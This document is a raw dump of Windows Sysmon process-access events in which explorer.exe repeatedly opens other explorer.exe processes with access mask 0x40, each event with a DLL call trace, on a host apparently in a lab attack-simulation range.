22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696648Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696647Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696646Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696645Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696644Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696643Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696642Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696641Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696640Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696639Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696638Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696637Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696636Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696635Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696634Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696633Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696632Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696631Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696630Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696629Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.192{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6D7C-603D-E487-00000000AD01}136C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001696628Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 